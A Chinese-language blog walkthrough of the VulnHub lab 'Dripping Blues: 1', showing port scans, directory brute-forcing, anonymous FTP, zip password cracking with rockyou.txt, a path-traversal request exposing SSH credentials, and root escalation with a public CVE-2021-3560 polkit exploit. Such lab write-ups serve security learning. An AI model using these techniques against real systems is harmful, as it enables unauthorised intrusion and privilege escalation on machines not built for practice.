天天看點

vulnhub刷題記錄(Dripping Blues: 1)

vulnhub刷題記錄(Dripping Blues: 1)
  • 英文名稱:Dripping Blues: 1
  • 中文名稱:滴水藍調:1
  • 釋出日期:2021 年 9 月 19 日
  • 難度:容易
  • 描述:關于 vm:測試并從 virtualbox 導出。啟用 dhcp 和嵌套 vtx/amdv。您可以通過電子郵件與我聯系以擷取故障排除或問題。
  • 下載下傳位址:https://www.vulnhub.com/entry/dripping-blues-1,744/
vulnhub刷題記錄(Dripping Blues: 1)

ailx10

網絡安全優秀回答者

網絡安全碩士

去咨詢

1、主機發現,IP位址為192.168.199.242

nmap -sP 192.168.199.0/24   
Nmap scan report for drippingblues.lan (192.168.199.242)           
vulnhub刷題記錄(Dripping Blues: 1)

主機發現

2、端口掃描,發現了21、22、80端口

nmap -A 192.168.199.242           
vulnhub刷題記錄(Dripping Blues: 1)

端口掃描

3、web通路

vulnhub刷題記錄(Dripping Blues: 1)

web首頁

4、目錄爆破,發現線索

└─$ dirb http://192.168.199.242/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Aug 21 14:51:29 2022
URL_BASE: http://192.168.199.242/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.199.242/ ----
+ http://192.168.199.242/index.php (CODE:200|SIZE:138)                                                                                
+ http://192.168.199.242/robots.txt (CODE:200|SIZE:78)                                                                                
+ http://192.168.199.242/server-status (CODE:403|SIZE:280)                                                                            
                                                                                                                                      
-----------------
END_TIME: Sun Aug 21 14:51:34 2022
DOWNLOADED: 4612 - FOUND: 3           
vulnhub刷題記錄(Dripping Blues: 1)

目錄爆破

5、線索提示,去計算ssh的密碼

vulnhub刷題記錄(Dripping Blues: 1)

ssh線索提示

6、挖掘21端口資訊,可以匿名登入,發現respectmydrip.zip檔案 ,下載下傳之後,發現需要密碼才能打開

vulnhub刷題記錄(Dripping Blues: 1)

ftp匿名登入

7、嘗試對檔案進行密碼破解,這裡使用134M的密碼本

vulnhub刷題記錄(Dripping Blues: 1)

rockyou.txt密碼本

8、啟動暴力破解

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip

PASSWORD FOUND!!!!: pw == 072528035           
vulnhub刷題記錄(Dripping Blues: 1)

暴力破解密碼

9、使用密碼,解開壓縮封包件,得到一個提示和另一個加密壓縮

just focus on "drip"              
vulnhub刷題記錄(Dripping Blues: 1)

得到提示和另一個加密壓縮包

10、嘗試web通路,得到密碼imdrippinbiatch

http://192.168.199.242/index.php?drip=../../../../etc/dripispowerful.html           
vulnhub刷題記錄(Dripping Blues: 1)

得到線索

11、根據登入頁面提示,使用者名是thugger

vulnhub刷題記錄(Dripping Blues: 1)

得到使用者名

12、ssh登入,拿到普通使用者的flag

vulnhub刷題記錄(Dripping Blues: 1)

ssh登入成功

vulnhub刷題記錄(Dripping Blues: 1)

普通使用者flag

13、尋找提權點,可疑點/usr/lib/policykit-1/polkit-agent-helper-1

thugger@drippingblues:~$ find / -perm -u=s 2>&1 | grep -v "Permission denied"
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign           
vulnhub刷題記錄(Dripping Blues: 1)

存在polkit程序

14、利用polkid提權漏洞[1]

CVE-2021-3560 是對 polkit 的一種身份驗證繞過,它允許非特權使用者使用 DBus 調用特權方法,在這個漏洞中我們将調用 accountservice 提供的 2 個特權方法(CreateUser 和 SetPassword),這允許我們建立一個特權使用者然後為其設定密碼,最後以建立的使用者身份登入,然後提升為root。

15、scp上傳poc腳本

vulnhub刷題記錄(Dripping Blues: 1)

上傳poc腳本

16、運作腳本,成功拿到root權限,獲得flag

thugger@drippingblues:~$ python3 CVE-2021-3560.py 
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse 
For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
**************
[+] Starting the Exploit 
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
........           
vulnhub刷題記錄(Dripping Blues: 1)

獲得root權限

到此,實驗完成~

參考

  1. ^Polkit-exploit https://github.com/Almorabea/Polkit-exploit

釋出于 2022-08-21 16:29